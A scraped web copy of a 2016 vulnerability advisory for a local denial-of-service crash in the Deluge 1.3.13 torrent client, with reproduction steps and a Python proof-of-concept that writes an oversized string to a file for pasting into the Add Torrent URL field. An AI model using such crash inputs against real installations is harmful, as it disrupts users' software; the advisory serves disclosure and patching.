Home / os / wince

Deluge 1.3.13 - Denial Of Service Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Deluge 1.3.13 - Denial Of Service Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>===================================================== [#] Exploit Title : Deluge 1.3.13 - Denial Of Service Vulnerability [#] Date Discovered : 2016-10-18 [#] Affected Product(s): Deluge v1.3.13 - Software [#] Exploitation Technique: Local [#] Severity Level: Low [#] Tested OS : Windows 10 ===================================================== [#] Product & Service Introduction: =================================== Deluge is free software, licensed under the GNU GPL4, BitTorrent network node. Based on Python and GTK +. The program uses the C ++ libtorrent as its own interface for network functionality through the torrent own Python bindings for the project. (Copy of the Vendor Homepage: http://deluge-torrent.org/ ) [#] Technical Details & Description: ==================================== A denial of service vulnerability is detected in the official Deluge v1.3.13 - Software. Local attackers can crash the software process via denial of service vulnerability. Vulnerable Module(s): [+] Fiel > Add torrent > Url > Name of the window "Since the Internet address" > URL (Input) [#] Proof of Concept (PoC): =========================== For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the local vulnerability ... 1. Run the script in python 2. Run the software Deluge.exe 3. Click `file`,` Add Torrent`, `Url` 4. Copy the characters that it is in the file `PoC.txt` 5. Glue the input characters in `URL` and click confirm 6. The crash software with success -- PoC Exploit Python -- #!/usr/bin/python junk = "x41" * 6000 junk1 = ("x2Ex73x6Ex64x00x00x01x18x00x00x42xDCx00x00x00x01" "x00x00x1Fx40x00x00x00x00x69x61x70x65x74x75x73x2E" "x61x75x00x20x22x69x61x70x65x74x75x73x2Ex61x75x22" "x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00") exploit = junk + junk1 try: print "[+] Creating POC" crash = open('PoC.txt','w'); crash.write(exploit); crash.close(); except: print "[-] No Permissions.." [#] Solution - Fix & Patch: =========================== Restrict the number of characters in input URL [#] Disclaimer: =============== Domain: www.zwx.fr Contact: msk4@live.fr Social: twitter.com/XSSed.fr Feeds: www.zwx.fr/feed/ Advisory: www.vulnerability-lab.com/show.php?user=ZwX packetstormsecurity.com/files/author/12026/ cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/ 0day.today/author/27461 Copyright © 2016 | ZwX - Security Researcher (Software & web application) </BODY></HTML>

 

TOP